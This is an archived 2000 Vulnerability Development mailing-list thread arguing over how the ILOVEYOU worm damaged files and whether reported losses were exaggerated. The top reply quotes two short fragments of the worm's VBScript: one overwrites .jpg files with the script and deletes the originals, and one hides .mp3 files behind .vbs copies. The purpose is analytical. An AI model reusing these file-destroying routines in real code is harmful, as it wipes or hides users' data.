Vulnerability Development mailing list archives
Re: I love you Author evidence ?
From: sachsm () JTFCND IA MIL (Sachs, Marcus)
Date: Wed, 10 May 2000 08:46:16 -0400
If the script executed properly, the .jpg's were replaced by a copy of the script and the originals deleted: elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) Only the .mp2's and .mp3's were hidden (attribute "2"): elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 ms -----Original Message----- From: Harmer, Mike [mailto:MHarmer () MVG COM] Sent: Tuesday, May 09, 2000 2:29 PM To: VULN-DEV () SECURITYFOCUS COM Subject: Re: I love you Author evidence ? This is not true. It replaces the .jpg files with itself, some times. There is some kind of bug at work, but it does not hide them. Michael E. Harmer Miller-Valentine Group 4000 Miller-Valentine Ct. Dayton, OH 45439-1487 x804 mharmer () mvg com ---------------------------------------------- In the middle of difficulty lies opportunity. --Albert Einstein ---------------------------------------------- -----Original Message----- From: White Vampire [mailto:whitevampire () MINDLESS COM] Sent: Monday, May 08, 2000 1:26 PM To: VULN-DEV () SECURITYFOCUS COM Subject: Re: I love you Author evidence ? On Sun, May 07, 2000 at 10:16:26PM -0500, Christofer C. Bell(cbell () JAYHAWKS NET) wrote: : I just wanted to point out that not all the losses are in terms of : shutdown email. I know of several of that had their business' webservers : impacted because Windows clients had the machines mounted via SMB : filesharing (the web development group specifically) and the "worm" : deleted the site's .jpg files. From what I read somewhere, the .JPG (et cetera) files are only marked 'hidden' and are easily recoverable. : This is just some additional insight on how the figure of $100M may have : been reached. I find this and most alleged 'damage figures' to be extreme. Regards, -- __ ______ ____ / \ / \ \ / / White Vampire\Rem \ \/\/ /\ Y / http://www.projectgamma.com/ \ / \ / http://www.webfringe.com/ \__/\ / \___/ http://www.gammaforce.org/ \/ "Silly hacker, root is for administrators."
Current thread:
- Re: I love you Author evidence ?, (continued)
- Re: I love you Author evidence ? Trevor Schroeder (May 07)
- Re: I love you Author evidence ? Lynn Baier (May 07)
- Windows NT 4.0 and Sendmail 3.0.1 for NT Brian DuRoss (May 08)
- Re: I love you Author evidence ? White Vampire (May 08)
- If virii are so dangerous, why is the internet still runing? Christopher Dinsmore (May 07)
- Re: I love you Author evidence ? Joe (May 07)
- Re: I love you Author evidence ? Blue Boar (May 07)
- Re: I love you Author evidence ? Sachs, Marcus (May 08)
- Re: I love you Author evidence ? Harmer, Mike (May 09)
- Re: I love you Author evidence ? White Vampire (May 09)
- Re: I love you Author evidence ? Sachs, Marcus (May 10)